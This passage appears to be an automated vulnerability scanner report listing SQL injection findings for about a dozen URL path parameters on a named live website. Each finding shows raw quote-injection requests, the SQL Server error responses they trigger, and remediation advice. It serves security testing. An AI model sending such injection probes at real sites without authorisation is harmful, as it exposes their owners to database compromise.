HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=GKKAFEIDEKKEENBNDEABDDBH; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw''/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=KKKAFEIDFKPAMPFJDHHHLABM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 26 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 26, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev'/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=OKKAFEIDBLGDPPHGEAPNOGKA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev''/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=BLKAFEIDNBKFKEOCAPMEFOHJ; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 27 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 27, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d'/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=GLKAFEIDJNAAGFMNFIDPLMEI; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d''/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=JLKAFEIDHKNJDMLHOIBIGEEJ; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 28 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 28, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images' HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 24040 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=OLKAFEIDFNMOPAFMBGCODHFB; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string '/articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images'' HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=AMKAFEIDIJHJJCJPOGMIAKDO; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html'/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=KNJAFEIDACNEBKJEKNFIHLIC; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html''/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=ONJAFEIDAJJBHODJFNJNDFMM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg'/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=COJAFEIDKEEFIKNNOIHPMKKB; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg''/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=GOJAFEIDAIMLBEMKPNPIDPAN; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c'/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=KOJAFEIDCPINPEDNLCEINCOI; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c''/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=OOJAFEIDOFDAKJEODIMLABPD; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d'/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CPJAFEIDFPINFDIBALLBIJIG; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d''/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=GPJAFEIDHJPPFOJIPKIECIMH; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h'/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=LPJAFEIDNNNNDPPKPIOBPIOK; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h''/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=PPJAFEIDGCMDFMPNGOIDNOIO; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 7, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447'/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=FAKAFEIDNMMGPNHDENINAJMM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447''/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=GAKAFEIDEHCDEPKGAGFFEEMD; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 8, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w'/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=KAKAFEIDHKLFBCNDHDILIDEK; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w''/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=PAKAFEIDBAMDGKCOEMAFMHKJ; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
